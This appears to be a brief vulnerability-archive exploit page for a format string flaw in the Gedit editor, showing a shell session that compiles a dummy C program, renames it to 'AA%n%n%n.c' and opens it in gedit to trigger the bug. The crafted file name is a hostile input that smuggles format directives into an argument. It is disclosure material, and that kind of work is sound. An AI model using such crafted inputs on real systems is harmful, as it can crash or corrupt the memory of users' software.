Gedit Filename Format String Vulnerability

info
discussion
exploit
solution
references

Gedit Filename Format String Vulnerability

The following example is available:

bash-2.05b#cat fmtexp.c

#include <stdio.h>

int
main()
{
printf("hah gedit\n");
}

bash-2.05b#gcc -o fk fmtexp.c

bash-2.05b#mv fk AA%n%n%n.c

bash-2.05b#gedit AA%n%n%n.c